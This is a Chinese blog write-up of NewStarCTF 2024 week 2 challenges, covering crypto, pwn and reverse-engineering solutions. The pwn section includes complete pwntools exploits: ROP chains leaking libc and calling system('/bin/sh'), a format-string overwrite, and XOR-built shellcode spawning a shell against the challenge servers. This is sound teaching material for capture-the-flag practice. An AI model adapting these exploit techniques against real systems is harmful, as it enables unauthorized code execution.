[NewStar 2024] week2

最新推荐文章于 2024-12-08 15:13:31 发布
最新推荐文章于 2024-12-08 15:13:31 发布
阅读量1k 收藏 6
点赞数 5
文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/142928435
版权

Crypto

第2周的密码依然都是签到题

这是几次方? 疑惑!

给了个提示:hint = p^e + 10086 这里边不要当成乘幂,而且加法的优先级高于异或,所以p=hint ^ (e+10086)得到p就能正常解RSA了

Since you konw something

给的c是flag和key的字符异或,拿flag{这个头异或得到key(只有两字节)

茶里茶气

一个简单的tea加密

v2 = derta*32%p
for i in range(31,-1,-1):
    v2 = (v2-derta)%p
    v0 -= (v1+v2) ^ ( 8*v1 + v5 ) ^ ( (v1>>7) + v6 ) ; v0 %= p
    v1 -= (v0+v2) ^ ( 8*v0 + v3 ) ^ ( (v0>>7) + v4 ) ; v1 %= p
    
long_to_bytes((v0<<99)+v1)
b'flag{f14gg9_te2_1i_7ea_7}'

Just one and more than two

RSA给了因子,直接求d解密即可

PWN

第2题还是挺新的。

My_GBC!!!!!

栈溢出题,但会把payload加下密,加密也很简单就是高3低5互换然后异或5a,只是没有pop rdx所以只能利用原来的值,每次只能泄露1字节,泄露完libc就可以直接getshell

from pwn import *
context(arch='amd64', log_level='debug')
elf = ELF('./vuln')
libc = ELF('./libc.so.6')
pop_rdi = 0x00000000004013b3 # pop rdi ; ret
pop_rsi = 0x00000000004013b1 # pop rsi ; pop r15 ; ret

def enc(pay):
   p2 = b''
   for v in pay:
       v2 = ((v>>3)|(v<<5))&0xff
       p2 += bytes([v2^0x5a])
   return p2

#p = process('./vuln')
#gdb.attach(p, "b*0x401343\nc")
p = remote('101.200.139.65', 39155)

pay = b'\0'*0x18
for i in range(6):
    pay += flat(pop_rdi,1,pop_rsi,elf.got['write']+i, 0, elf.plt['write'])

pay += p64(elf.sym['main'])

p.sendafter(b"Input something: \0O", enc(pay))

p.recvline()
p.recvline()
libc.address = u64(p.recv(6)+b'\0\0') - libc.sym['write']
bin_sh = next(libc.search(b'/bin/sh\0'))
print(f"{libc.address = :x}")

pay = b'\0'*0x18 + flat(pop_rdi, bin_sh, libc.sym['system'])
p.sendafter(b"Input something: \0O", enc(pay))

p.interactive()

Inverted World

read不是标准函数,是从当前位置向前写。这样就会溢出到read函数的返回地址。这题比较新颖的并且用$0来代替/bin/sh。头回见。

from pwn import *
context(arch='amd64', log_level='debug')

p = remote('39.106.48.123', 13049)

for i in range(8):
    p.recvline()

pay = p64(0x40137c)+ b'A'*0x100
p.send(pay[::-1]+b'\n')

p.send(b'0$')

p.interactive()

 

easy fmt

先printf泄露再栈溢出,基础题

from pwn import *
context(arch='amd64', log_level='debug')
libc = ELF('./libc.so.6')

p = remote('39.106.48.123', 38698)

p.sendafter(b"data: \n", b'%16$p\n%19$p\n')
stack = int(p.recvline() ,16) - 8
libc.address = int(p.recvline(),16) - 0x29d90
pop_rdi = libc.address + 0x000000000002a3e5 # pop rdi ; ret
print(f"{stack =:x} {libc.address = :x}")

#12,13
pay = flat(pop_rdi+1, pop_rdi, next(libc.search(b'/bin/sh\0')), libc.sym['system'])
for i,v in enumerate(pay):
    if v!=0:
        p2 = f"%13$n%{v}c%12$hhn".encode().ljust(0x20,b'\0') + flat(stack+i, stack-0x4c)
    else:
        p2 = f"%13$n%12$hhn".encode().ljust(0x20,b'\0') + flat(stack+i, stack-0x4c)
    p.sendafter(b"data: \n", p2)

p.sendafter(b"data: \n", b'cat flag\n')
p.sendafter(b"data: \n", b'cat flag\n')
p.send(b'cat flag\n')

p.interactive()

ez_game

栈溢出

from pwn import *
context(arch='amd64', log_level='debug')
libc = ELF('./libc-2.31.so')
elf = ELF('./attachment')
pop_rdi = 0x400783

p = remote('39.106.48.123', 16231)

p.sendafter(b"Welcome to NewStarCTF!!!!\n", b'\0'*0x58+ flat(pop_rdi, elf.got['puts'], elf.plt['puts'], elf.sym['func']))
p.recvline()
libc.address = u64(p.recvline()[:-1]+b'\0\0') - libc.sym['puts']
print(f"{libc.address = :x}")

p.sendafter(b"Welcome to NewStarCTF!!!!\n", b'A'*0x58+ flat(pop_rdi+1, pop_rdi, next(libc.search(b'/bin/sh\0')), libc.sym['system']))

p.interactive()

Bad Asm

shellcode限制了syscall要用异或构造,常用的有xor [rsi+rbx],xx和xor [rip],xx前边这个可构造做单位置的可见字符异或,后边这个可以地址未知情况下直接异或后边两字节。

from pwn import *
context(arch='amd64', log_level='debug')

p = remote('39.106.48.123', 34301)

shellcode = '''
mov rsp,rsi;
add rsp,0x70;
push rdi;pop rsi;
xor rdi,rdi;
push 0x70; pop rdx;
push 0x17; pop rbx;
xor byte ptr[rsi+rbx],0x40
'''
shellcode = asm(shellcode)+b'\x0f\x45'
p.sendlineafter(b"Input your Code : \n", shellcode)

sleep(0.5)
p.send(b'\x90'*0x20+ asm(shellcraft.sh()))
p.interactive()

REV

UPX

用upx解相壳,这是linux下的壳要用linux下的upx解

from pwn import p64, xor

s = [0x8500fad99f8f4de3,0x4b71c1444f623ecd,0x0000890b853a7a63]
data = [0x9b2effe3b9af60c4,0x7d5fee6e515610f5,0x0000b5759c2b6e7d]
xor(b''.join([p64(i) for i in s]), b''.join([p64(i) for i in data]),b'A')
b'flag{Do_you_know_UPX?}AA'

drink_TEA

这是个标准的tea跟例子一样的。TEA加密是最容易魔改的,换移位组合sum等。

from ctypes import * 
from pwn import u32,p32

def decrypt(v,k):
	v0=c_uint32(v[0])
	v1=c_uint32(v[1])
	delta=0x9e3779b9
	sum1=c_uint32(delta*32)
	for i in range(32):
		v1.value-=((v0.value<<4)+k[2])^(v0.value+sum1.value)^((v0.value>>5)+k[3])
		v0.value-=((v1.value<<4)+k[0])^(v1.value+sum1.value)^((v1.value>>5)+k[1])
		sum1.value-=delta
	return p32(v0.value)+p32(v1.value)

key = b'WelcomeToNewStar'
key = [u32(key[i:i+4]) for i in range(0,16,4)]

c = bytes.fromhex('78 20 F7 B3 C5 42 CE DA85 59 21 1A 26 56 5A 5929 02 0D ED 07 A8 B9 EE36 59 11 87 FD 5C 23 24'.replace(' ',''))
c = [u32(c[i:i+4]) for i in range(0,32,4)]

m = b''.join(decrypt(c[i:i+2],key) for i in range(0,8,2))
#flag{There_R_TEA_XTEA_and_XXTEA}

Ptrace

主程序father调起子程序,并且通过ptrace修改子程序的代码,实现隐藏关键值的目的,这里子程序是移4位,主程序改为3

  puts("Please input your flag:");
  __isoc99_scanf("%32s", &s, v4, v5, v6, v7, v8, v9);
  v11 = fork();
  if ( v11 )
  {
    if ( v11 <= 0 )
    {
      perror("fork");
      return -1;
    }
    wait(stat_loc);
    ptrace(PTRACE_POKEDATA, addr, addr, 3); #修改子进程中移位4->3
    ptrace(PTRACE_CONT, 0, 0, 0);
    wait(0);
  }
  else
  {
    ptrace(PTRACE_TRACEME, 0, 0, 0);
    execl("./son", "son", &s, 0);
  }
c = 'CC8D2CEC6F88EDEB2FEDAEEB4EAC2C8D8D2FEB6DCDEDEEEB0E8E4E2C6CACE7AF'
bytes([((i<<3)|(i>>5))&0xff for i in bytes.fromhex(c)])
#flag{Do_you_really_know_ptrace?}

 

ezencrypt

安卓题,java里先进行AES_ECB+base64再调用jni进行xor+rc4

key = b"IamEzEncryptGame" #title

key2 = b'meow'
#Python>idc.get_bytes(0x32c0,44).hex()
enc = 'c26c73f43a450eba47812a26f6796078b3646ddcc904323b9f329560ee8297e7ca3daa9576c59b1d89db985d'

#AES_ECB -> base64 -> xor -> RC4

#flag{0hh_U_kn0w_7h15_5ki11}

PangBai 泰拉记(1)

 这里开了反调,如果监测到启用了调试就会运行上边函数,正常运行就是下边。

这种东西一共就两个,可以都试吧。并不会增加难度,除非那个人非理解代码不可。

  if ( miao | IsDebuggerPresent() )
  {
    qmemcpy(v3, "nhvviCS", 7);
    v3[7] = 127;
    qmemcpy(v4, "R{e8%oCrdepIvebcR", 17);
    v4[17] = 127;
    qmemcpy(v5, "b>&ah{", sizeof(v5));
    for ( j = 0; j < 32; ++j )
      key[j] ^= v3[j];
  }
  else
  {
    qmemcpy(v7, "nhvviguMI?u\",o/fWivoM;", 22);
    v7[22] = 127;
    qmemcpy(v8, "Homy2.l#{", sizeof(v8));
    for ( k = 0; k < 32; ++k )
      key[k] ^= v7[k];
  }

key = b'key1key2key3key4key6key7key8key9'

c = b'can you find me can you find me?'

key2 = b"nhvviCS\x7fR{e8%oCrdepIvebcR\x7fb>&ah{" #
key3 = b"nhvviguMI?u\",o/fWivoM;\x7fHomy2.l#{"

xor(key,key3,c)
#b'flag{my_D3bugg3r_may_1s_banned?}'

 

Dirty_flowers

反汇编,就是针对IDA的,加花指令,比如jz a;jnz a;不管怎么样就跟到a,但IDA理解不了,会把前边加的EX理解成跳转然后就乱了。手工nop以后就能正常反编译。

key = b"dirty_flower"
v3 = [2, 5, 19, 19, 2, 30, 83, 31, 92, 26, 39, 67, 29, 54, 67, 7, 38, 45, 85, 13, 3, 27, 28, 45, 2, 28, 28, 48, 56, 50, 85, 2, 27, 22, 84, 15]

xor(bytes(v3),key)
#b'flag{A5s3mB1y_1s_r3ally_funDAm3nta1}'

NewStarCTF 2024 公开赛道 Week1
2401_85238540的博客
07-20 1926
使用风二西(风大)的轩禹RSA工具分解模数N,然后计算私钥,计算明文,明文转字符即可获得flag。
NewStarCTF 2023---Web week2
WMY0323的博客
01-09 597
本题是一个反序列化题目,从题目中可以分析出,题目中定义了一个类evil,一个成员属性为private私有的cmd,过滤了cat、tac、more、tail、base并且大小写都进行了过滤。使用post方式进行传参,参数为unser。
NewStarCTF2024-Week2-Misc-WP
Welcome To Myon'Blog !
10-16 1651
这个是 Windows 早期使用的 LM 哈希,通常较弱,容易被破解。在现代系统中一般用 aad3b435b51404eeaad3b435b51404ee 表示未启用(即空值)。我们需要爆破第二个的 hash,NTLM 算法生成的哈希值
NewStarCTF 2024 公开赛道 Week2_newstarctf 2024 week2 pzthon(1)
2401_83946722的博客
04-13 1228
e),在类外部无法直接访问。在类外部尝试为cmd属性被定义为私有(private),在类外部无法直接访问。在类外部尝试为cmd属性被定义为私有(private),在类外部无法直接访问。在类外部尝试为payload对象的 $cmd 属性赋值,这会触发访问控制错误。所以我们使用构造函数赋值:将 $cmd 的赋值移到构造函数中,这样就可以在对象创建时为 $cmd 赋值。修改你的类这样,你在创建 evil 对象时将命令传递给构造函数,并且在构造函数中将命令赋值给 $cmd 属性。
NewStarCTF2024-Week2-Web-WP
Welcome To Myon'Blog !
10-16 1601
在 PHP8 之前,如果参数中出现中括号[,那么中括号会被转换成下划线_,但是会出现转换错误,导致如果参数名后面还存在非法字符,则不会继续转换成下划线。也就是说,我们可以刻意拼接中括号制造这种错误,来保留后面的非法字符不被替换,因为中括号导致只会替换一次。顺便说下这里回溯绕过和数组绕过都是不行的,回溯一般用于匹配不到的情况,这里是要求匹配成功,其次我传了下服务器直接处理不了,数组的话也是一般用于匹配不到,因为 preg_match 处理不了数组会直接返回 false,显然这里需要的是返回 true。
newstarctf2022week2
kuzemax的博客
11-04 641
为啥var到eeee,一开始我个人觉得是这么整var->new Easy()->new eeee()我这里是试出来的因为原来构造出来的行不通,后来问了问学长说看var那个类里就行,obj-check(var),obj给那个有call的类,那个没有check方法,调call,call里有clone函数,clone var之后会调var的__clone。像REST API,往往我们的请求需要多个API,每个API是一个类型。多输入几位看看有多少行数据,测试了一下,有12列,可以更换列名,挨个尝试。
NewStar CTF 2024 re方向 week2 wp
xy_hzz的博客
10-15 1126
PangBai泰拉记(1)没做出来,其他题目都有wp。
NewStarCTF 2023 week5--web
pwfortune的博客
07-12 1265
比如别人读取的文件, 应该是要有个docker然后再是后面的数字啊, 有点懵,感觉应该是环境变了。却没有反应,啥也没有,不知道为啥,看别人的博客应该是可以的。不管前面的反序列化,直接利用 php://input ,猜测路径为var/www/html。不晓得为啥1.php就是无法执行命令, 蚁剑也连不上,可能哪里出问题了 哎,太菜了。网上搜到的一个, 但是用不了,可能具体的版本不一样,尝试使它报错,得到具体的版本情况。离谱了,之前都还行,现在环境又不行了 , 一样的参数, 我真服了, 重启也不行。
Newstar week5 WEB Unserialize Again(phar反序列化,__wakeup()绕过,phar重签名)
2301_76690905的博客
11-10 568
newf = s + sha1(s).digest() + h # 对要签名的数据进行SHA-1哈希计算,并将原始数据、签名和类型/标识拼接成新的数据newf。//写文件,文件名是$pear,内容是$file。f = file.read() #打开名为1.phar的文件,以二进制只读模式读取文件内容,并将其存储到变量f中。在文件系统函数(file_exists()、is_dir()等)参数可控的情况下,配合phar://伪协议,可以。因为重新赋值修改了文件的内容,之前的签名就会无效,所以需要。
2023NewStarCtf [WEEK2] web 方向超详细wp(题目+思路+拓展知识点)
2301_76690905的博客
10-15 1910
这里需要修改前端js文件,用变量覆盖修改gamescore的值,使得判定为大于100000分。步骤:火狐找到调试器下的js文件,在里面gamescore这一行打断点(点一下347那行的开头就行),然后点击开始游戏,游戏会在打中目标的时候停在断点处,这时候点击控制台,在里面写入gameScore=99999999999然后回车,就相当于给这里的gamescore赋值了99999999999,然后点击左上角这个运行,回到调试器把鼠标移到gamescore上面看看有没有赋值成功,然后点击运行,就能弹出flag。
2024-NewStarCTF-WEEK1
2301_80185313的博客
10-10 1605
2024-NewStarCTF-WEEK1 wp
NerSCTF 2024 wp
m0_74473137的博客
11-07 118
某喜欢抽锐刻5的皇帝想每天进步一些,直到他娶了个模,回到原点,全部白给😅 这是他最后留下的讯息:ksjr{EcxvpdErSvcDgdgEzxqjql},flag包裹的是可读的明文。
NewStar CTF 2024 Week1,Week2部分
2301_79355407的博客
10-22 1378
(JWT 并不对数据进行加密,而仅仅是签名,不同的数据对应的签名不一样,因此在没有密钥的情况下,你可以查看里面的数据,但修改它则会导致服务器验签失败,从而拒绝你的进一步请求)你似乎无法抵御这种感觉的萦绕,像是一瞬间被推入到无法言喻的深渊。「像■■■■验体■■不可能■■■■ JWT 这种■■ Pe2K7kxo8NMIkaeN ■■■密钥,除非■■■■■走,难道■■■■■■吗?PangBai 以一种难以形容的表情望着你——激动的、怀念的,却带着些不安与惊恐,像落单后归家的雏鸟,又宛若雷暴中遇难的船员。
TEA加密算法及newstarctf2024茶里茶气
2401_87451820的博客
12-08 2078
TEA是一种对称加密算法,使用相同的密钥进行加密解密,也是一种块加密算法(加密数据时以64位(8字节)为一组),TEA算法的密钥长度为128位(16字节)TEA采用与DES算法类似的Feistel结构(采用模加减代替异或xor),迭代的每次循环使用加法和移位操作,对明文和密钥进行扩散和混乱,实现明文的非线性变换。
NewStar PangBai 过家家(3)wp
LH1013886337的博客
10-26 593
解出来pyc文件,然后需要反编译,用的unemp6去发编译,失败了,字节码什么太高,版本3.9。64位,然后显示PyInstaller,查了下,好像是要解包。小白有点看不懂,直接问GPT,原来是异或那部分没反编译成功。但是好像还是不全,可以用pycdas,看机器码。尝试各种方法,最终使用pycdc去反编译。用的pyinstxtractor.py。给了一个exe,peid查看。
NewStarCTF 2024第一第二周部分wp
2301_79704829的博客
10-22 2866
2024NewStarCTF 第一第二周wp
NewStarCTF week2 部分题解
Aiwin的博客
09-29 4153
NewStarCTF week2 尽力的某些题解
七校联合NewStarCTF 公开赛赛道WEEK2 web wp
trytowritecode的博客
09-26 3323
NewStarCTF week2 web WP
CTF-Misc领域】文件隐写、内存取证与数据修复技术应用:安全竞赛核心技能解析
最新发布
05-17
内容概要:本文详细介绍了CTF-Misc题型的应用指南,涵盖文件隐写、内存取证、数据修复等方面的核心技术。文件操作与隐写部分,讲述了文件类型识别方法(如使用file命令、010 Editor等工具查看文件特征),以及文件分离与合并的方法(如Binwalk自动化工具、dd命令手动操作)。图片隐写技术方面,包括颜色通道分析(如使用Stegsolve)、帧差异对比、Exif信息读取等。内存取证则主要围绕Volatility框架展开,介绍其基础命令(如imageinfo、pslist)和特殊场景处理(如加密文档爆破)。此外,还提供了若干工具推荐,如十六进制编辑器、自动化分离工具、OCR识别库等,并分享了实战技巧,如逆向思维应用和隐蔽信息挖掘。 适合人群:对CTF比赛感兴趣的安全研究人员、网络安全爱好者及有一定计算机基础知识的学习者。 使用场景及目标:①掌握文件隐写与修复技术,能够识别和处理各种文件类型的隐写和损坏问题;②学会使用Volatility进行内存取证,提取关键信息;③提高对隐蔽信息的敏感度,培养解决复杂问题的能力。 阅读建议:本文内容丰富,涉及多个技术领域,建议读者先熟悉基本概念和常用工具的使用,再逐步深入理解各个技术细节,在实践中不断积累经验。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值